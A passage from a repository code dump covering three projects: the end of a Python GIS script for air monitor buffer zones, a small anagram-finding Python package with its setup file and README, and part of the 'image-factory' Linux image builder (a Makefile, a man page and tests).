mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.POLYLINE_TYPE)\n #print(mosaicFilename)\n polyLineValues.append(mosaicFilename) \n #print(polyLineValues)\n\ndef determinePointBufferList(airMonitor, pointBufferList):\n for fileName in values.POINT_BUFFER_LIST:\n pointBufferList.append(fileName)\n \n\ndef determinePointList(airMonitor, pointList):\n for file in values.POINT_LIST:\n pointList.append(file)\n if(len(values.POINT_MOSAIC_LIST) > 0):\n for variable in values.POINT_MOSAIC_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.POINT_TYPE)\n pointList.append(mosaicFilename)\n\n# setup and calculate average values for a buffer zone\ndef processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,variableType, fileList):\n readyToJoin = False\n continueVar = True\n while (continueVar):\n try:\n argumentList = []\n argumentList2 = []\n argumentList3 = []\n argVars = []\n if(variableType == values.PARALLEL_PROCESSING):\n rasterList = fileList[0]\n polylineList = fileList[1] \n if(len(fileList)>0):\n print(\"the polylineList is \" + str(len(polylineList)))\n pool = multiprocessing.Pool(len(polylineList))\n if(len(polylineList) >0):\n argumentList = []\n argumentList = BufferVariables.createArgumentList(polylineList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n #pool = multiprocessing.Pool(len(polylineList))\n result = pool.map(BufferVariables.multi_run_polyline_wrapper,argumentList2) # calculate average polyline values on parallel processors\n pool.close()\n pool.join()\n readyToJoin = BufferVariables.testFileCompletion(argumentList) \n #BufferVariables.testProgress(result)\n #readyToJoin = BufferVariables.testFileCompletion(argumentList2) \n elif(variableType == values.RASTER_TYPE): # if the variable files are from rasters, run the raster wrapper function\n if(len(fileList)>0):\n pool = multiprocessing.Pool(processes=2)\n #pool = multiprocessing.Pool(len(fileList))\n argumentList = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n \n result = pool.map_async(BufferVariables.multi_run_raster_wrapper,argumentList) # calculate average raster values on parellel processors\n #time.sleep(60)\n BufferVariables.testProgress(result)\n readyToJoin = BufferVariables.testFileCompletion(argumentList)\n elif(variableType == values.POLYLINE_TYPE): # if the variable files are from polyline shp files, ru nthe polyline wrapper function \n if(len(fileList)>0):\n pool = multiprocessing.Pool(len(fileList))\n argumentList2 = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n result = pool.map(BufferVariables.multi_run_polyline_wrapper,argumentList2) # calculate average polyline values on parallel processors\n pool.close()\n pool.join() \n readyToJoin=True\n elif(variableType==values.POINT_BUFFER_TYPE):\n if(len(fileList)>0):\n argumentList3 = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor)\n BufferVariables.pointBufferIntersect(argumentList3[0][0], argumentList3[0][1],argumentList3[0][2], argumentList3[0][3], argumentList3[0][4])\n readyToJoin=True\n if(readyToJoin):\n for argument in argumentList: # for each variable that was used to calculate an average values, add the value to the air monitor partition shp file\n # print(\"hot dog\") for debugging purposes only\n BufferVariables.addVariableToPartition(argument, airMonitor,values.RASTER_TYPE)\n for argument in argumentList2:\n BufferVariables.addVariableToPartition(argument, airMonitor,values.POLYLINE_TYPE)\n for argument in argumentList3:\n BufferVariables.addVariableToPartition(argument, airMonitor,values.POINT_BUFFER_TYPE)\n else:\n raise Exception\n #print(\"sucessfully added buffer variables\")\n except Exception as e:\n print(\"couldn't process variables, loop will cycle again\" + str(e))\n pool.terminate()\n continue\n finally:\n if(variableType == values.RASTER_TYPE) or(variableType == values.PARALLEL_PROCESSING):\n try:\n pool.terminate()\n except:\n print(\"could not terminate pool\")\n try:\n dirList = os.listdir(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE)\n for dirFolder in dirList:\n path = values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE + \"/\" + dirFolder\n dirList2 = os.listdir(path)\n for dirFolder2 in dirList2:\n path2 = path + \"/\" + dirFolder2\n dirList3 = os.listdir(path2)\n for dirFolder3 in dirList3:\n path3 = path2 + \"/\" + dirFolder3\n try:\n shutil.rmtree(path3) \n except:\n #print(\"couldn't remove filepath \" + path3)\n exceptTemp = 1\n try:\n fileList = os.listdir(path3)\n print(fileList)\n for filename in fileList:\n try:\n os.remove(path2 +\"/\" + filename)\n except:\n # print(\"warning: could not delete the temp stats file \" + filename )\n exceptTemp = 1\n except:\n excpetTemp = 1 \n #print(\"warning: could not delete the temp stats files\") \n except:\n # print(\"couldn't delete the list directories\") \n exceptTemp = 1\n break\n print(\"finished calculating \" + str(variableType) + \" type values for buffer \" + str(buffer) + \" of air monitor partition \" + identifier) \n try:\n del pool, argVars, argumentList, fileList\n except:\n print(\"couldn't delete pool\")\n \n### end of processBufferVariables \n \n \n########## end of helper functions ###############\n \n \n \n \n \n############ main function ##################\ndef main():\n print(\"running main\")\n if not os.path.exists(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE): os.makedirs(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE)\n #BufferVariables.runPointAnalysis() # get point values \n zonesDefined = BufferVariables.assignZones()\n if not os.path.exists(constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE): os.makedirs(constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE) \n print(\"defined buffer zones\")\n airMonitorPartitions = BufferVariables.partitionShapefile(zonesDefined) # partition air monitor stations\n print(\"defined air monitor partitions\")\n airMonitorPartitions = airMonitorPartitions[0:len(airMonitorPartitions)]\n makeBufferZones(airMonitorPartitions) # make buffer zones for each partition\n i=0\n for airMonitor in airMonitorPartitions: # for each air monitor partition\n startTime = time.time()\n if(i>=0):\n rasterList = []\n polyLineList = []\n pointList = []\n pointBufferList = []\n determineRasterList(airMonitor,rasterList)\n determinePolylineList(airMonitor, polyLineList)\n determinePointList(airMonitor, pointList)\n determinePointBufferList(airMonitor, pointBufferList)\n print(pointList)\n #BufferVariables.runPointAnalysis(airMonitor, pointList)\n identifier = BufferVariables.determineAirMonitorIdentifier(airMonitor) # determine the partition number\n partitionFolderOut = values.RESULTS_FOLDER + values.KEYWORD + identifier + \"/\" \n for buffer in values.BUFFER_DISTANCE: # for each buffer radius \n bufferFilename = \"buffer\" + str(buffer) + \"m.shp\" \n masterBufferFile = values.RESULTS_FOLDER + values.KEYWORD + identifier + values.BUFFER_EXTENSION + bufferFilename \n maxThreads = 1 #multiprocessing.cpu_count()*2 -2\n if(1 > 5):#maxThreads >= len(rasterList) + len(polyLineList)):\n print(\"running polyline and raster buffer variables in parallel\")\n parallelList = [rasterList,polyLineList]\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor, values.PARALLEL_PROCESSING, parallelList)\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor, values.POINT_BUFFER_TYPE, pointBufferList)\n else:\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.RASTER_TYPE, rasterList) # get average raster values\n #processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.POLYLINE_TYPE,polyLineList) # get average polyline values\n #processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.POINT_BUFFER_TYPE,pointBufferList) # get average point values\n print (\"completed buffer distance \" + str(buffer) + \" for air Monitor partition \" + str(identifier))\n #print(\"completed gathering buffer values for air monitoring station partition \" + str(identifier))\n print(\"time required to process partition \" + str(identifier) + \": \" + str(time.time()-startTime))\n i+=1\n print(\"completed gathering buffer values for all air monitoring station partitions\")\n arcpy.Merge_management(inputs=airMonitorPartitions,output=values.RESULTS_FOLDER + \"final.shp\",field_mappings=\"#\") \n #arcpy.ExportXYv_stats\n print (\"completed running the main script\")\n\n### end of main function ###\n \n\n# run the main function\nif __name__ == '__main__':\n main()\n \n \n########## end of runScripts.py ###############" } ]
6
MichaelQuant4R/holistic-anagram2
https://github.com/MichaelQuant4R/holistic-anagram2
3c00e702cfe42e839a6491b1b8c37595be83633e
913e1185d50a64a9f9ba39d82d437d47dcba2c79
d2891a643dd904bc0f6ee40d4a668ba264529772
refs/heads/main
2023-07-27T09:51:34.440286
2021-09-10T13:16:51
2021-09-10T13:16:51
405,105,655
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43466460704803467, "alphanum_fraction": 0.4369910955429077, "avg_line_length": 21, "blob_id": "d45f4414ba18279a5c7d64f79a68711de9b7f1d2", "content_id": "ae7a90cb79acf49cd2f1134ba4a94b848e2c4a64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2579, "license_type": "permissive", "max_line_length": 63, "num_lines": 117, "path": "/build/lib/holistic_anagram/holistic_anagram.py", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "import os\nfrom .english_heroku import heroku_words\n\nclass Anagram(object):\n \n __author__ = 'Michael S. Russell'\n __email__ = '[email protected]'\n __version__ = '1.0.12'\n \n def __init__(self):\n \n self.words = None\n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n self.json = {\"anagram\": [], \"non-anagram\": []}\n self.path = os.getcwd()\n \n def init_app(self, heroku=False):\n \n if heroku:\n \n self.words = heroku_words.split(\" \")\n \n else:\n \n with open(self.path + \"\\\\english.txt\", \"r\") as r:\n words = r.read().replace(\"\\n\", \",\").split(\",\")\n\n self.words = words\n \n \n def enter_words_print(self):\n \n self.sentence = input(\"Enter words for anagram algo: \")\n\n mylist = self.sentence.split(\" \")\n \n mylist = list(set(mylist))\n\n for word in mylist:\n\n if word in self.words:\n\n self.real_words.append(word)\n\n for word in self.real_words:\n\n self.res[tuple(sorted(word))] = []\n\n for key in self.res:\n\n for word in self.real_words:\n\n if tuple(sorted(word)) == key:\n\n self.res[key].append(word)\n \n for w in list(self.res.values()):\n\n if len(w) >= 2:\n print(\"Anagram :\", w)\n\n else:\n\n print(\"Not an anagram :\", w)\n print()\n \n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n\n \n def enter_words_json(self, sentence):\n \n self.sentence = sentence\n\n mylist = self.sentence.split(\" \")\n \n mylist = list(set(mylist))\n\n for word in mylist:\n\n if word in self.words:\n\n self.real_words.append(word)\n\n for word in self.real_words:\n\n self.res[tuple(sorted(word))] = []\n\n for key in self.res:\n\n for word in self.real_words:\n\n if tuple(sorted(word)) == key:\n\n self.res[key].append(word)\n \n \n for w in list(self.res.values()):\n\n if len(w) >= 2:\n \n self.json[\"anagram\"].append(w)\n\n else:\n\n self.json[\"non-anagram\"].append(w)\n \n data = self.json\n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n self.json = {\"anagram\": [], \"non-anagram\": []}\n \n return data\n \n" }, { "alpha_fraction": 0.5274102091789246, "alphanum_fraction": 0.539697527885437, "avg_line_length": 26.05714225769043, "blob_id": "cb999c1f7d4d7a6a8326093977114918b4a491a0", "content_id": "db41a30e1fcd65beb1d58a46407074a37e4b4740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 61, "num_lines": 35, "path": "/setup.py", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\ndef readme():\n \n with open(\"README.md\") as f:\n README = f.read()\n \n return README\n\n\nsetup(\n \n name = \"holistic-anagram\",\n version=\"1.0.12\",\n description = \"A python package for anagrams\",\n long_description=readme(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/MichaelQuant4R/holistic-anagram\",\n author=\"Michael S. Russell\",\n author_email=\"[email protected]\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.0\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\"\n ],\n package_data = {\"holistic_anagram\":[\"english.txt\"]},\n packages = [\"holistic_anagram\"],\n package_dir ={\"holistic_anagram\":\"holistic_anagram\"},\n include_package_data = True,\n install_requires=[]\n\n)\n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.7373887300491333, "alphanum_fraction": 0.7448071241378784, "avg_line_length": 30.325580596923828, "blob_id": "af091a4f45fea5fe21d609557c18ba6ec8bb61d4", "content_id": "a5c608dbbc52b53155612a5ce09e8b42f81139f1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1348, "license_type": "permissive", "max_line_length": 134, "num_lines": 43, "path": "/README.MD", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "# ANAGRAM READ ME \n\nThere are several methods that can be used in the holistic_anagram.py file. These include:\n\n- init_app\n- enter_words_print\n- enter_words_json\n\n\n### Install\n\n**Note: python-anagram requires python3**\n\n```shell\npip install holistic-anagram\n```\n\n### Website using python-anagram\n- [anagram website example](https://holistic-anagram.herokuapp.com)\n\n\n### Steps on how to use python-anagram package\n1. Create an instance of your anagram. Example: anagram = Anagram()\n2. Initialize your instance. anagram.init_app(). This allows the app to check if a word is real or not.\n3. You can then enter words using `enter_words_print` method or\n`enter_words_json`. The former is as an interactive script using the input function.\nThe later requires the sentence argument, and generates json data to be used in a web application e.g. in FastAPI, Flask, Django, etc.\n\n### Example of use\n- Type in `bats tabs tekken attack on titan no rats tsar star tops tops spot stop psto psto pots`\n- This will remove the non-English words, remove duplicates and leave you with:\n`bats tabs attack on titan no rats tsar star tops spot stop`\n- It then checks if any of the words are anagrams of each other.\n- Output is either a print statement or returns json formatted data.\n\n\n### Dependencies\n- No dependencies\n\n### Python versions\n - 3.7.x\n - 3.8.x\n - 3.9.x\n\n" } ]
3
wake3532/hello
https://github.com/wake3532/hello
7f7c43f8920edf0d8ba4d73d609c3c6ff5476e9b
c4627ed9a85d53ff7e933783b8d907cbb5b5c15b
35238e4ac82c75138bad24eaa12beaec746bc61e
refs/heads/main
2023-01-30T20:47:11.611054
2020-12-08T04:50:14
2020-12-08T04:50:14
319,528,444
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6140519976615906, "alphanum_fraction": 0.621270477771759, "avg_line_length": 29.484848022460938, "blob_id": "11a3587c97936e4a2ea147b7abb0438fe60ff304", "content_id": "125564c7036e005ee5e16c590975fc627163210a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2378, "license_type": "no_license", "max_line_length": 150, "num_lines": 66, "path": "/auzrabot.py", "repo_name": "wake3532/hello", "src_encoding": "UTF-8", "text": "import discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport asyncio\r\nimport random\r\nimport urllib\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import Request\r\nfrom urllib import parse\r\nimport bs4\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\[email protected]\r\nasync def on_ready():\r\n print('봇이 로그인 하였습니다.')\r\n print(' ')\r\n print('닉네임 : {}'.format(client.user.name))\r\n print('아이디 : {}'.format(client.user.id))\r\n\r\[email protected]\r\nasync def on_ready():\r\n print('봇이 로그인 하였습니다.')\r\n print(' ')\r\n print('닉네임 : {}'.format(client.user.name))\r\n print('아이디 : {}'.format(client.user.id))\r\n while True:\r\n user = len(client.users)\r\n server = len(client.guilds)\r\n messages = [\"모든 비트코인 구매 : 센트럴젠비코자판기.kro.kr \", \"모두들 환영합니다 구매는 : 센트럴젠비코자판기.kro.kr \" , \"코로나 의심시 1339 \" , \"코로나 2.5단계 의심시 전화를 해야합니다 😨\"]\r\n for (m) in range(5):\r\n await client.change_presence(status=discord.Status.dnd, activity=discord.Activity(name=messages[(m)], type=discord.ActivityType.watching))\r\n await asyncio.sleep(4)\r\n\r\n\r\[email protected]\r\nasync def on_member_join(member):\r\n syschannel = member.guild.system_channel.id \r\n try:\r\n embed=discord.Embed(\r\n title=f'모두들 환영해주세요 🎃',\r\n description=f'{member}님 환영해요. 메리크리스마스 ! \\n현재 서버 인원수: {str(len(member.guild.members))}명',\r\n colour=0x00ff00\r\n )\r\n embed.set_thumbnail(url=member.avatar_url)\r\n await client.get_channel(syschannel).send(embed=embed)\r\n except:\r\n return None\r\[email protected]\r\nasync def on_member_remove(member):\r\n syschannel = member.guild.system_channel.id \r\n try:\r\n embed=discord.Embed(\r\n title=f'왜 나가요 😭',\r\n description=f'{member}님이 센트럴젠을 나갔습니다 😭 \\n현재 서버 인원수: {str(len(member.guild.members))}명',\r\n colour=discord.Colour.red()\r\n )\r\n embed.set_thumbnail(url=member.avatar_url)\r\n await client.get_channel(syschannel).send(embed=embed)\r\n except:\r\n return None\r\n \r\naccess_token = os.environ[\"BOT_TOKEN\"]\r\nclient.run(access_token)\r\n" } ]
1
ionos-enterprise/image-factory
https://github.com/ionos-enterprise/image-factory
737ba4d563e2bbec13d19976890bc6cce353d7ce
95626367c5fad4a66dca321e050b6c68529e24f0
f463c2676158d4df6c61c305233555ba66c34fe6
refs/heads/master
2023-08-28T12:05:35.054167
2022-05-04T08:06:55
2022-05-04T08:06:55
286,790,954
7
0
null
null
null
null
null
[ { "alpha_fraction": 0.6898339986801147, "alphanum_fraction": 0.6950207352638245, "avg_line_length": 41.844444274902344, "blob_id": "03624e656159fb1c2ccff2227f637e47d69f9e91", "content_id": "a4a5156d9f772e8d357ea8d74c718ecee8f195c2", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "permissive", "max_line_length": 88, "num_lines": 45, "path": "/tests/test_black.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run black code formatter in check mode.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass BlackTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the black code\n formatter in check mode on the Python source code. The list of\n source files is provided by the get_source_files() function.\n \"\"\"\n\n def test_black(self):\n \"\"\"Test: Run black code formatter on Python source code.\"\"\"\n\n cmd = [\"black\", \"--check\", \"--diff\", \"-l\", \"99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n ) as process:\n output = process.communicate()[0].decode()\n\n if process.returncode == 1: # pragma: no cover\n self.fail(f\"black found code that needs reformatting:\\n{output.strip()}\")\n if process.returncode != 0: # pragma: no cover\n self.fail(f\"black exited with code {process.returncode}:\\n{output.strip()}\")\n" }, { "alpha_fraction": 0.6806108951568604, "alphanum_fraction": 0.7051792740821838, "avg_line_length": 34.02325439453125, "blob_id": "8967c9092e9b1de0f5b6dbbf702d55545bd28fbd", "content_id": "165d45ae13eec0bbabed518fc8ba17d5247b8ad0", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1506, "license_type": "permissive", "max_line_length": 109, "num_lines": 43, "path": "/Makefile", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "PREFIX ?= /usr/local\n\nVERSION := 1.0.2\nDIST := image-factory image-factory.1.md image-factory.conf image_factory.py \\\n\timage-factory-sudo-helper image-factory-sudo-helper.1.md LICENSE Makefile NEWS.md README.md \\\n\ttests/__init__.py tests/pylint.conf tests/test_black.py tests/test_cli.py tests/test_flake8.py \\\n\ttests/test_helper.py tests/test_isort.py tests/test_pylint.py tests/test_sudo_helper.py \\\n\t$(wildcard data/*.cfg) $(wildcard data/*.xml)\n\nall: doc\n\ncheck:\n\tpython3 -m unittest discover -v\n\nclean:\n\trm -f *.1\n\ndist: image-factory-$(VERSION).tar.xz image-factory-$(VERSION).tar.xz.asc\n\nversion:\n\t@echo $(VERSION)\n\n%.asc: %\n\tgpg --armor --batch --detach-sign --yes --output $@ $^\n\n%.tar.xz: $(DIST)\n\ttar -c --exclude-vcs --transform=\"s@^@$*/@S\" $^ | xz -cz9 > $@\n\ndoc: image-factory.1 image-factory-sudo-helper.1\n\n%.1: %.1.md\n\tpandoc -s -t man $^ -o $@\n\ninstall:\n\tinstall -D -m 755 image-factory $(DESTDIR)$(PREFIX)/bin/image-factory\n\tinstall -D -m 755 image-factory-sudo-helper $(DESTDIR)$(PREFIX)/bin/image-factory-sudo-helper\n\tinstall -D -m 644 image-factory.1 $(DESTDIR)$(PREFIX)/share/man/man1/image-factory.1\n\tinstall -D -m 644 image-factory-sudo-helper.1 $(DESTDIR)$(PREFIX)/share/man/man1/image-factory-sudo-helper.1\n\tinstall -d $(DESTDIR)$(PREFIX)/share/image-factory\n\tinstall -m 644 $(wildcard data/*) $(DESTDIR)$(PREFIX)/share/image-factory\n\tinstall -D -m 644 image-factory.conf $(DESTDIR)$(PREFIX)/share/doc/image-factory/image-factory.conf\n\n.PHONY: all check clean doc install version\n" }, { "alpha_fraction": 0.694261372089386, "alphanum_fraction": 0.6984407901763916, "avg_line_length": 28.76555061340332, "blob_id": "c75c7e7350a7286e0c591b7842965102ef8b3961", "content_id": "edc339b7922752c879289d9d412f87e201012540", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6221, "license_type": "permissive", "max_line_length": 79, "num_lines": 209, "path": "/image-factory.1.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "---\ndate: 2020-08-05\nfooter: image-factory\nheader: \"image-factory's Manual\"\nlayout: page\nlicense: 'Licensed under the ISC license'\nsection: 1\ntitle: IMAGE-FACTORY\n---\n\n# NAME\n\nimage-factory - build golden Linux images\n\n# SYNOPSIS\n\n**image-factory** [**-h**|**\\--help**] [**-c**|**\\--cache-dir** *CACHE_DIR*]\n[**-f**|**\\--format** {*qcow2*,*raw*}] [**\\--image-size** *IMAGE_SIZE*]\n[**\\--mac** *MAC*] [**\\--installer-logs**] [**\\--no-installer-logs**]\n[**\\--log-file**] [**\\--no-log-file**] [**\\--log-filename** *LOG_FILENAME*]\n*image*\n\n# DESCRIPTION\n\n**image-factory** is a command line tool for building golden Linux images. It\nuses **virt-install** to do installations via the network. The installation and\nconfiguration of the images is done using the netinstall support from the\ndistributions, i.e.\n\n* preseed for Debian/Ubuntu\n* Kickstart for CentOS/Fedora\n* AutoYaST for openSUSE\n\n**image-factory** is used by IONOS Cloud to build the golden public Linux\nimages for their Enterprise Cloud. The configuration files are shipped with\nthis project to allow anyone to rebuild their images.\n\n**image-factory** runs following steps:\n\n* Create a virtual RAW image using qemu-img.\n\n* Cache **linux** kernel and **initrd**.\n\n* Run installation using **virt-install**. *qemu:///session* is used as session\nfor normal users and *qemu:///system* when run as root.\n\n* The installation partition is mounted and the installer logs are removed.\n\n* **zerofree** is run on the partition.\n\n* If **format** is set to *qcow2*, the virtual raw images will be converted\nto qcow2 using **qemu-img**.\n\n* The SHA 256 sum is calculated for the image.\n\n* The image will be uploaded to all locations configured in\n**upload_destinations**.\n\n* If **post-build-command** is configured, the specified command will be\nexecuted.\n\n# OPTIONS\n\n**-h**, **\\--help**\n: Show a help message and exit\n\n**-c** *CACHE_DIR*, **\\--cache-dir** *CACHE_DIR*\n: Cache directory (default: *~/.cache/image-factory* or\n*var/cache/image-factory* for root)\n\n**-f** {*qcow2*,*raw*}, **\\--format** {*qcow2*,*raw*}\n: Image format to use (default: *raw*)\n\n**\\--image-size** *IMAGE_SIZE*\n: Size of the raw image (default: *2G*)\n\n**\\--mac** *MAC*\n: MAC address used in the installation machine\n\n**\\--installer-logs**\n: Print installer logs into logging output\n\n**\\--no-installer-logs**\n: Do not print installer logs into logging output\n\n**\\--log-file**\n: Store logs into a file (in addition to stdout/stderr)\n\n**\\--no-log-file**\n: Do not store logs into a file (in addition to stdout/stderr)\n\n**\\--log-filename** *LOG_FILENAME*\n: log into specified file\n\n*image*\n: Image to build. The date in form of *YYYY-MM-DD* and the file format\nsuffix will be added to the generated image filename.\n\n# CONFIGURATION\n\nEach image needs to be also configured in */etc/image-factory.conf* or\n*~/.config/image-factory.conf*. These configuration files use the INI\nfile format. The image name will be used as section and following keys are\nused:\n\n**append**\n: Extra kernel parameter for the netboot image to use\n\n**cache_dir**\n: Cache directory (default: *~/.cache/image-factory* or\n*var/cache/image-factory* for root). Can be overridden by **\\--cache-dir**.\n\n**cores**\n: Number of CPU cores to use during installation. Default: *1*\n\n**format**\n: Image format to use. Can be *qcow2* or *raw* (default). Can be overridden\nby **\\--format**.\n\n**image-size**\n: Size of the raw image (default: *2G*). Can be overridden by\n**\\--image-size**.\n\n**initrd**\n: URI of the netboot installer initrd. Supported schemes are *file:*,\n*http:*, *https:*, and *rsync:*. Unless using *file:*, the specified initrd\nwill be cached locally.\n\n**installer-logs**\n: Boolean whether to print installer logs into logging output. Can be\noverridden by **\\--installer-logs** or **\\--no-installer-logs**.\n\n**keep-raw**\n: Boolean whether to keep raw image (in case format is not raw). Default is\n*False*.\n\n**kickstart**\n: Filename of the Kickstart file. Needed when using Kickstart on\nCentOS/Fedora.\n\n**linux**\n: URI of the netboot installer Linux kernel. Supported schemes are *file:*,\n*http:*, *https:*, and *rsync:*. Unless using *file:*, the specified kernel\nwill be cached locally.\n\n**log-file**\n: Boolean whether to store logs into a file (in addition to stdout/stderr).\nCan be overridden by **\\--log-file** or **\\--no-log-file**.\n\n**log-filename**\n: Filename to log into (if enabled). Can be overridden by\n**\\--log-filename**.\n\n**mac**\n: MAC address used in the installation machine. Can be overridden by\n**\\--mac**.\n\n**post-build-command**\n: Optional command to run after the image was successfully built. The name\nof the image will be passed as first argument.\n\n**preseed**\n: Filename of the preseed file. Needed when using preseed on Debian/Ubuntu.\n\n**ram**\n: Memory for virtual machine to use during installation.\n\n**upload_destinations**\n: Comma-separated list of upload destinations. Each upload destination\nneeds a section in the configuration file (see UPLOAD DESTINATION CONFIGURATION\nbelow). To disable the upload, let **upload_destinations** undefined or set to\nan empty string.\n\n**vnc**\n: VNC port for the installation virtual machine. It is recommended to bind\nthe VNC port to localhost only.\n\n**yast**\n: Filename of the AutoYaST file. Needed when using AutoYaST on openSUSE.\n\n# UPLOAD DESTINATION CONFIGURATION\n\nEach upload destination configured in **upload_destinations** needs a section\nin the INI configuration, where at least **upload_type** and **upload_target**\nare set. Following keys are accepted:\n\n**post-upload-command**\n: Additional command to run after a successful upload. *${image}* can be\nused as parameter in post-upload-command. If multiple commands are needed,\nsuffix the key with a number (counting up from 1), e.g.\n**post-upload-command1**.\n\n**upload_args**\n: Additional arguments for the upload command to use, e.g. *\\--progress*\nfor uploads with rsync.\n\n**upload_target**\n: Upload target in the format the upload type supports it.\n\n**upload_type**\n: Type of upload. Currently only *rsync* is supported.\n\n# SEE ALSO\n\nqemu-img(1), virt-install(1), zerofree(8)\n\n# AUTHOR\n\nBenjamin Drung <[email protected]>\n" }, { "alpha_fraction": 0.6317080855369568, "alphanum_fraction": 0.6430543065071106, "avg_line_length": 39.25925827026367, "blob_id": "4d80119e2c61fbe7f5a1f81633342d9ca64e1238", "content_id": "ece5333fa627ac4068932b2b996573587a2cbc55", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "permissive", "max_line_length": 94, "num_lines": 81, "path": "/tests/test_sudo_helper.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test image-factory-sudo-helper script.\"\"\"\n\nimport os\nimport subprocess\nimport unittest\n\n\nclass TestSudoHelper(unittest.TestCase):\n \"\"\"\n This unittest class tests the image-factory-sudo-helper script.\n \"\"\"\n\n SCRIPT = os.path.join(os.path.dirname(__file__), \"..\", \"image-factory-sudo-helper\")\n\n def call_helper(self, cmd, silence=False):\n \"\"\"Call the image-factory-sudo-helper script in dryrun 